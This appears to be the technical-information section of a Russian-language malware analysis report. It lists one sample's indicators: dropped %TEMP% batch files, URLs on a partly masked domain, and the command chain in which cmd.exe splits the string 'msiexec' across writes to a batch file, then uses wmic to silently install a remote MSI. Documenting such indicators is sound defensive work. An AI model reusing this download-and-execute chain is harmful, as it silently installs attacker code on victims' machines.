Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\ZGBdc.bat&echo|set /p="iexec /i http://gb##sic.me/backup.msi /q'" >> %temp%\ZGBdc.bat&%temp%\ZGBdc.bat>%temp%\ZGBdc.txt
- %TEMP%\zgbdc.bat
- %TEMP%\zgbdc.txt
- http://gb##sic.me/backup.msi
- http://gb##sic.me/cgi-sys/suspendedpage.cgi
- DNS ASK gb##sic.me
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\ZGBdc.bat&echo|set /p="iexec /i http://gb##sic.me/backup.msi /q'" >> %temp%\ZGBdc.bat&%temp%\ZGBdc.bat>%temp%\ZGBdc.txt' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\ZGBdc.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://gb##sic.me/backup.msi /q'" 1>>%TEMP%\ZGBdc.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://gb##sic.me/backup.msi /q'
- '<SYSTEM32>\msiexec.exe' /i http://gb##sic.me/backup.msi /q